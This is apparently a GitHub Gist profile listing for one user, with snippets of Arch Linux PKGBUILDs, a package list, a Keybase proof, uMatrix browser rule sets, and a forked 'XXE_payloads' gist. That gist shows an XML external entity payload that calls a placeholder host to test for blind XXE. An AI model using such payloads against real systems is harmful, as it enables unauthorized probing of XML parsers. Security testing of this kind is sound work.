Skip to content

Instantly share code, notes, and snippets.

View xee5ch's full-sized avatar

Al xee5ch

View GitHub Profile
@xee5ch
xee5ch / config.el
Created April 9, 2014 09:45
My Current ~/.trell/config.el
(setq *consumer-key* "********************************")
(setq *access-token* "****************************************************************")
@xee5ch
xee5ch / PKGBUILD
Created July 30, 2014 14:16
PKGBUILD
# Maintainer: Bersam Karbasion <[email protected]>
# Contributor: linuxSEAT <[email protected]>
# Contributor: Nezmer <[email protected]>
# Contributor: Alexander Stein <[email protected]>
pkgname=bicon
pkgver=0.4
pkgrel=5
pkgdesc="A bidirectional console"
url="https://github.com/behdad/bicon/"
arch=('any')
@xee5ch
xee5ch / homealCodearchlinuxbuildsccl-binPKGBUILD
Created September 13, 2014 06:44
/home/al/Code/archlinux/builds/ccl-bin/PKGBUILD
# Maintainer: Adlai Chandrasekhar <munchking at gmail dot com>
# Creator: Leslie P. Polzer <polzer at gnu dot org>
# Contributor: Fernando L. Canizo <conan at lugmen dot org dot ar>
pkgname=ccl-bin
pkgver=1.10
pkgrel=1
pkgdesc="x86 and x86-64 binary versions of Clozure Common Lisp"
url="http://ccl.clozure.com/"
license=('LGPL')
arch=('i686' 'x86_64')
acl 2.2.52-2
acpi 1.7-1
acpid 2.0.27-1
adwaita-icon-theme 3.18.0-1
alsa-lib 1.1.0-1
alsa-plugins 1.1.0-3
alsa-utils 1.1.0-1
android-platform 23_r02-1
android-sdk 24.4.1-1
android-sdk-build-tools r23.0.2-1
@xee5ch
xee5ch / PKGBUILD_xonsh_git_branch_andor
Last active March 16, 2016 19:13
A custom Arch AUR PKGBUILD file for use with xonsh-git, but with the andor branch.
# Maintainer: megadriver <megadriver at gmx dot com>
pkgname=xonsh-git
_gitname=xonsh
pkgver=0.2.6.r5.g54a11e7
pkgrel=1
pkgdesc="A Python-ish, BASHwards-compatible shell"
url="http://github.com/scopatz/xonsh"
arch=('any')
license=('FreeBSD')

Keybase proof

I hereby claim:

  • I am xee5ch on github.
  • I am ay5lee4k (https://keybase.io/ay5lee4k) on keybase.
  • I have a public key whose fingerprint is FE39 2A56 BF95 E9B5 E14B CA6D 3729 EB09 8C25 62FF

To claim this, I am signing this object:

@xee5ch
xee5ch / umatrix-user-rules-default.txt
Created December 18, 2016 08:38
Default ruleset implemented by uMatrix when installed on Chrome/Chromium at the time of publication for this gist.
https-strict: * true
matrix-off: about-scheme true
matrix-off: behind-the-scene true
matrix-off: chrome-extension-scheme true
matrix-off: chrome-scheme true
matrix-off: localhost true
matrix-off: opera-scheme true
referrer-spoof: * true
* * * block
* * css allow
@xee5ch
xee5ch / umatrix-user-rules-xee5ch-custom-starter-template.txt
Created December 18, 2016 08:40
My preferred uMatrix rules to start out a new profile, block pretty much everything, including 1st party stuff. Only allow CSS and Images to make it readable before enabling, scripts, cookies, etc.
https-strict: * true
matrix-off: about-scheme true
matrix-off: behind-the-scene true
matrix-off: chrome-extension-scheme true
matrix-off: chrome-scheme true
matrix-off: localhost true
matrix-off: opera-scheme true
referrer-spoof: * true
ua-spoof: * true
* * * block
@xee5ch
xee5ch / XXE_payloads
Created March 14, 2017 14:22 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
class SecurityAssessment extends SecurityAssessmentPlanSAP {}